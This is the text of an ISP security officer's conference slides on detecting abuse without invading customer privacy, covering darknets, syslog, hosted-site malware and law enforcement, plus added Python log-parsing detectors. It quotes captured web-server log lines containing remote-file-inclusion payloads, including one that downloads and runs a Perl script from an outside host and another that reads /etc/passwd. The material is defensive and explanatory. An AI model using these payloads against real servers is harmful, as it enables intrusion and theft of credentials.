I walk the line.

etherealattractive / Security

14 Jun 2012 (5 years and 5 months ago)


I walk the line. Privacy & Security
Scott A. McIntyre
KPN-CERT / XS4ALL

Security Officer says: “NO!”

4 hackers to 250 employees

Strong company ethics in security & privacy

Lawsuits (which we usually win)

Bound by Dutch privacy laws

Our Terms of Use cover abuse

Dedicated Abuse Centre

We are determined to not be part of the problem, but not at the cost of customer’s online privacy.
Our network
[Network diagram: XS4ALL.net circa 2000. Nodes: adsl, dialup, switch, sara, paalbergweg, singel, Internet. Link speeds shown: 100Mbit and 1Gbps.]
But, we’re a small country.
More people started getting DSL....
XS4ALL 2006
[Network diagram: ADSL/Internet only. Nodes: adsl, dialup, sara, telecity, singel, Drentestraat, two Internet uplinks. Link speeds shown: 2 x 100Mbit, 1Gbps and 10Gbps.]
Packets vs. Privacy
Privacy-sensitive tooling.

Flow based, ip headers only.

My own netflow scripts, nfdump, Arbor

Darknets, honeynets, etc.

Malware analysis.

Common sense and experience.
A picture is worth 1k words

Using our graphing tools to give us an
indication of issues

Keeps customers details completely private

Helps us shape policy

Quick way to spot trends

...great for presentation slides!
Darknet Wormwatch
Sometimes the problem is just too obvious...
6.4 Mpps does not fit into 2Mbit DSL
3.1Gbps does not fit into 100Mbit FE
[Graphs: pps of evil heading towards customers; pps of individual customers with infections]
Darknets
What makes a good darknet?

Some RFC 1918 space

True Darknet space

Many ways to observe what hits it

Gives a good measure of automated activity to and from customers

Can be used in combination with honeypots to gather malware
Daily darknet output
StartTime Type Dport InPkt OutPkt InBytes OutBytes
15 Sep 06 22:59:43 tcp 445 86534 0 5526468 0
15 Sep 06 22:59:48 udp 1026 70579 0 34870313 0
15 Sep 06 22:59:42 tcp 135 62357 0 4345070 0
15 Sep 06 22:59:46 tcp 139 49543 0 3309646 0
15 Sep 06 22:59:48 udp 1027 44443 0 21924826 0
15 Sep 06 23:21:47 icmp 13054 0 1558536 0
15 Sep 06 22:59:50 tcp 80 8670 0 599420 0
15 Sep 06 23:21:17 tcp 4899 5550 0 345296 0
15 Sep 06 23:02:09 tcp 1433 4669 0 309658 0
15 Sep 06 23:50:51 tcp 22 3629 0 266222 0
15 Sep 06 23:13:54 udp 137 3526 0 324392 0
15 Sep 06 23:11:58 tcp 5900 2715 0 177654 0
15 Sep 06 23:02:34 udp 1029 1892 0 1092089 0
15 Sep 06 23:07:10 udp 1025 1875 0 948475 0
15 Sep 06 23:02:34 udp 1028 1872 0 1075389 0
15 Sep 06 23:23:59 tcp 25 1713 0 109278 0
16 Sep 06 00:03:57 tcp 3128 1099 0 63954 0
15 Sep 06 23:54:01 tcp 15118 1092 0 67704 0
15 Sep 06 23:00:54 tcp 4662 1085 0 69346 0
[Graphs: Darknet traffic; Tessa (not a darknet)]
Use the log, Luke.
Syslog solves

Most servers and services support it

A bit more pattern recognition required to spot the trends

Once you know you have an incident, reviewing syslogs can give extra insight

Example sources:

WWW logs

Authentication logs

Email logs
Syslog examples
Jun 3 16:25:30 lo0..xs4all.net: FW: ge-4/0/0.42 D tcp 80.126.89.xxx 10.56.64.1 58466 135 (1 packets)
Jun 3 16:25:30 lo0..xs4all.net: FW: ge-5/0/0.42 D tcp 82.92.124.xxx 192.168.2.200 14156 135 (1 packets)
Jun 3 16:25:30 lo0..xs4all.net: FW: ge-2/1/1.160 D tcp 83.68.4.xxx 213.244.168.218 2160 445 (1 packets)
Jun 3 16:25:30 lo0..xs4all.net: FW: ge-1/0/1.0 D tcp 62.251.173.xx 62.251.44.237 3890 445 (1 packets)
Jun 3 16:25:30 lo0..xs4all.net: FW: ge-5/0/0.42 D tcp 80.126.106.xxx 192.168.167.20 20348 135 (1 packets)
Jun 3 16:25:30 lo0..xs4all.net: FW: ge-5/0/0.42 D tcp 82.92.157.xx 10.10.11.3 29266 135 (1 packets)
Jun 3 16:25:30 lo0..xs4all.net: FW: ge-4/0/0.42 D tcp 82.92.216.xxx 192.168.25.11 26953 135 (1 packets)
Jun 3 16:25:30 lo0..xs4all.net: FW: ge-5/0/0.42 D tcp 80.126.65.xx 10.90.0.2 11749 135 (1 packets)
Jun 3 16:25:32 lo0..xs4all.net: FW: ge-2/1/1.160 D tcp 200.118.94.33 62.216.26.210 3666 1433 (1 packets)
Jun 3 10:07:16 localhost sshd[562]: Illegal user nicu from 202.216.232.227
Jun 3 10:07:19 localhost sshd[564]: Illegal user ciprian from 202.216.232.227
Jun 3 10:07:22 localhost sshd[566]: Illegal user diana from 202.216.232.227
Jun 3 10:07:24 localhost sshd[568]: Illegal user carmen from 202.216.232.227
Jun 3 10:07:27 localhost sshd[570]: Illegal user dumitru from 202.216.232.227
Jun 3 10:07:30 localhost sshd[572]: Illegal user constantin from 202.216.232.227
Jun 3 10:07:32 localhost sshd[574]: Illegal user nicolae from 202.216.232.227
Jun 3 10:07:34 localhost sshd[576]: Illegal user matei from 202.216.232.227
Jun 3 10:07:37 localhost sshd[578]: Illegal user victor from 202.216.232.227
Jun 3 10:07:39 localhost sshd[580]: Illegal user dragos from 202.216.232.227

Router firewall packet drops
SSH authentication drops
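The two syslog shapes above need the "bit more pattern recognition" the previous slide mentions. The Python below is an added example, not part of the original deck or of XS4ALL's own tooling: it parses router firewall drop lines and sshd "Illegal user" lines, counts per-source drops towards the default-filtered Windows ports (a sign of an infected customer) and per-source distinct user names (a sign of a password scanner), and masks the customer's last octet in its output the way the slides do. The sample lines, host names, addresses and thresholds are constructed.

```python
import re
from collections import defaultdict

# Constructed sample lines in the two formats shown on the slides
# (router firewall drops and sshd "Illegal user" messages); addresses,
# host names and user names are made up for this example.
SYSLOG = """\
Jun 3 16:25:30 lo0.rtr.example.net: FW: ge-4/0/0.42 D tcp 192.0.2.17 10.56.64.1 58466 135 (1 packets)
Jun 3 16:25:30 lo0.rtr.example.net: FW: ge-4/0/0.42 D tcp 192.0.2.17 10.56.64.2 58467 135 (1 packets)
Jun 3 16:25:31 lo0.rtr.example.net: FW: ge-4/0/0.42 D tcp 192.0.2.17 10.56.64.3 58468 445 (1 packets)
Jun 3 16:25:31 lo0.rtr.example.net: FW: ge-5/0/0.42 D tcp 192.0.2.99 10.10.11.3 29266 80 (1 packets)
Jun 3 10:07:16 localhost sshd[562]: Illegal user alpha from 198.51.100.5
Jun 3 10:07:19 localhost sshd[564]: Illegal user bravo from 198.51.100.5
Jun 3 10:07:22 localhost sshd[566]: Illegal user charlie from 198.51.100.5
Jun 3 10:07:24 localhost sshd[568]: Illegal user alpha from 198.51.100.6
"""

# interface, action D(rop), proto, src, dst, sport, dport, packet count
FW_RE = re.compile(r"FW: (\S+) D (\w+) (\S+) (\S+) (\d+) (\d+) \((\d+) packets\)")
SSH_RE = re.compile(r"sshd\[\d+\]: Illegal user (\S+) from (\S+)")
WORM_PORTS = {135, 139, 445}  # the ports the slides filter by default

def mask(ip):
    """Hide the last octet, as the slides do, so reports stay privacy-friendly."""
    return ".".join(ip.split(".")[:3]) + ".xxx"

def worm_suspects(lines, min_drops=3):
    """Customer sources whose dropped packets to RPC/SMB ports reach min_drops."""
    drops = defaultdict(int)
    for m in filter(None, map(FW_RE.search, lines)):
        if m.group(2) == "tcp" and int(m.group(6)) in WORM_PORTS:
            drops[m.group(3)] += int(m.group(7))
    return {mask(ip): n for ip, n in drops.items() if n >= min_drops}

def ssh_scanners(lines, min_users=3):
    """Remote sources that tried at least min_users distinct non-existent users."""
    users = defaultdict(set)
    for m in filter(None, map(SSH_RE.search, lines)):
        users[m.group(2)].add(m.group(1))
    return {ip: len(u) for ip, u in users.items() if len(u) >= min_users}

if __name__ == "__main__":
    lines = SYSLOG.splitlines()
    print("infected-looking customers:", worm_suspects(lines))
    print("ssh user-name scanners:", ssh_scanners(lines))
```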
HTTP server logs
217.16.16.222 - - [03/Jun/2006:11:28:54 +0200] x.websites.xs4all.nl "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.x.at/tool25.txt?&cmd=cd%20/tmp/;lwp-download%20http://www.x.at/alba.txt;perl%20alba.txt;rm%20-rf%20alba.*? HTTP/1.0" 200 45 "-" "Mozilla/5.0"
81.214.183.54 - - [02/Jun/2006:21:33:21 +0200] www.xs4all.nl "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.x.x.net/cmd/tool25.jpg?cmd=id HTTP/1.0" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
85.99.88.59 - - [02/Jun/2006:22:48:41 +0200] www.xs4all.nl "GET /ashnews/ashheadlines.php?pathtoashnews=http://uol.x.x.pt/tool25/tool25.png?&cmd=id HTTP/1.0" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
85.98.96.80 - - [03/Jun/2006:04:24:08 +0200] www.xs4all.nl "GET /modules/Forums/admin/index.php?phpbb_root_path=http://xpl.x.com/tool25.dot?&cmd=id HTTP/1.0" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
213.171.218.188 - - [02/Jun/2006:07:29:48 +0200] x.websites.xs4all.nl "GET /index.php?site=http://busca.x.x.br/uol/index.html?&cmd=id HTTP/1.1" 200 966 "-" "-"
69.41.179.178 - - [02/Jun/2006:07:44:51 +0200] x.websites.xs4all.nl "GET /index.php?pagina=http://x.x.us/cmd.gif?&cmd=cat%20/etc/passwd HTTP/1.1" 403 - "-" "libwww-perl/5.803"
200.162.113.11 - - [02/Jun/2006:16:52:30 +0200] x.websites.xs4all.nl "GET http://www.x-x.nl/site.php?page=http://www.x.de/mitglieder_profil_files/Moderator/Table/Moderator/Jobs/www/src/tool25.txt?&cmd=id HTTP/1.0" 200 7482 "-" "-"
85.98.152.24 - - [01/Aug/2006:17:34:48 +0200] www.x.nl "GET /index.php?mosConfig_absolute_path=http://6x.1.x.244/x/tool25.txt?&cmd=id HTTP/1.0" 200 6654 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
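What the HTTP log entries above have in common is a query-string parameter whose value is a complete remote URL (a remote file inclusion attempt against a PHP application), usually paired with a cmd parameter; the response status tells the reviewer whether the server actually served something. The Python below is an added example, not part of the original slides or of XS4ALL's tooling, that flags such requests in combined-format access logs with a virtual-host field; the sample lines, host names and addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines in the layout shown on the slides
# (client, ident, user, timestamp, vhost, request, status, bytes, referer, agent).
ACCESS_LOG = """\
203.0.113.7 - - [03/Jun/2006:11:28:54 +0200] www.example.nl "GET /index.php?mosConfig_absolute_path=http://evil.example/tool.txt?&cmd=id HTTP/1.0" 200 45 "-" "Mozilla/5.0"
203.0.113.8 - - [02/Jun/2006:07:44:51 +0200] www.example.nl "GET /index.php?pagina=http://evil.example/cmd.gif?&cmd=cat%20/etc/passwd HTTP/1.1" 403 - "-" "libwww-perl/5.803"
203.0.113.9 - - [02/Jun/2006:09:00:00 +0200] www.example.nl "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 966 "-" "Mozilla/4.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] (\S+) "(\S+) (\S+) [^"]*" (\S+) ')
REMOTE_RE = re.compile(r"(?i)^https?://")

def rfi_hits(lines):
    """One record per request carrying a remote URL as a parameter value."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than crash
        src, ts, vhost, method, target, status = m.groups()
        # parse_qsl percent-decodes values, so an encoded "http%3A%2F%2F" is
        # still caught; keep_blank_values keeps "?&cmd=id" style queries intact.
        params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
        remote = [k for k, v in params if REMOTE_RE.match(v)]
        if remote:
            hits.append({
                "src": src, "time": ts, "vhost": vhost, "params": remote,
                "cmd": any(k == "cmd" for k, _ in params),
                "status": status,  # "200" means the host served something: review it
            })
    return hits

if __name__ == "__main__":
    for h in rfi_hits(ACCESS_LOG.splitlines()):
        print(h)
```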
Other places to find malware
/tmp & friends
12 -rwxrwxrwx 1 klant wheel 5092 May 9 06:32 /www/tmp/ppp
28 -rwxrwxrwx 1 klant wheel 14080 May 9 06:39 /www/tmp/yim
8 -rw-r--r-- 1 klant wheel 2100 May 9 06:27 /www/tmp/dc.pl
24 -rwxrwxrwx 1 klant wheel 11788 May 9 06:29 /www/tmp/rootbsd
64 -rwxrwxrwx 1 klant wheel 32768 May 9 06:42 /www/tmp/fbsd48local
4 -rw-r--r-- 1 klant wheel 1457 May 9 06:32 /www/tmp/ppp.c
4 -rw-r--r-- 1 klant wheel 1026 May 9 06:34 /www/tmp/maelx.c
92 -rwxrwxrwx 1 klant wheel 97356 May 9 06:36 /www/tmp/bsdlocal
12 -rwxrwxrwx 1 klant wheel 5169 May 9 06:34 /www/tmp/maelx
Amount Rate/s Rate/min Key
814 81.40 4884.0 82.92.65.xx.32776 www.xz.nl. (29)
638 63.80 3828.0 82.92.65.xx.32776 A? www.xz.nl.
1100 110.00 6600.0 213.84.213.xxx.37274 xz.xz.net. (34)
Domain name: sbcglobal.net
Expected query count: 97
Observed query count: 2583
Domain name: x.xxx.94.82.in-addr.arpa
Expected query count: 242
Observed query count: 44285
DNS abuse checkers
USER PID Run Time Sys Time State Command
klant2 11723 1D 12:52:23 0.61 select php4 /htdocs/administrator/
components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.x.com/x/malware.txt?
klant4 519 0D 11:19:40 0.41 select ñ∙p?Ῠ÷î
klant5 98164 0D 05:12:29 12541.38 nochan ifconfig
klant8 25349 0D 02:22:57 8.60 select httpd
klant5 32991 0D 04:40:05 12014.82 nochan [x-dot-net]
klant6 8370 0D 03:22:18 5.30 select /WWW/klant/htdocs/.kernel
klant6 8371 0D 03:22:15 3.18 select /WWW/klant/htdocs/.kernel/httpd
ls /proc/evil
Other tools that don’t invade privacy

Abuse handling stuff

Tools to notify, filter, review

VIRBL (mostly a NL thing though...)

SMTP logs for viruses outbound

Daily incoming virus detection logs

Third parties firewall reporters

MyNetWatchman

Dshield
Abuse tooling

You need the tools to respond to the threat.

Ingress/Egress network filtering

Default customer filtering (135/445, etc)

A Walled Garden

We combine features with privacy protection

Ticketing system to track issues and history
Law Enforcement & Legislation

No one (sane) is in favour of online crime

Working with LEA in co-operative ventures can be fruitful

You’re the tech experts, educate them!

Lawful Interception

Providers must stay active in keeping this from being abused.

CIOT & Data Retention

How necessary is it for the government to know everything about your online existence, now and in the future?
So...the balance...

Develop investigation skills in lieu of tech toys.

But can be time consuming and have higher error rate

Sadly, education does not work, some tech needed.

People’s behaviour does not change

Smart company policies and procedures can help.

Abuse Centre, “Walled Garden” and proactive abuse detection

Use the data you have more efficiently.

Watch your infrastructure, not your customers.

Syslog, sendmail, errors, flow, snmp, whatever.

Darknets, honeypots, friendly customers, malware analysis.

Provide tools to customers to help report abuse

Personal firewalls, D-Shield, MyNetWatchman, anti-malware products.
The future...
Tomorrow

IPv6

Does anything good happen here?

VoIP

Money money money

Don’t apply old paradigms to new technologies

Embedded systems

If it can communicate, it can probably be compromised

PDA, GSM, PVR/Satellite systems

Any new product or service must have abuse and security evaluated
Summary

Build secure products

Security officer must play a role in review!

Have pro-active abuse/security policies

Stay vigilant of new threats

Be creative in how you investigate security incidents.

Be able to step in technically as needed

SQL Slammer by way of example

Accept some trade-offs.

Police involvement, when handled correctly, helps fight online crime.
Any questions?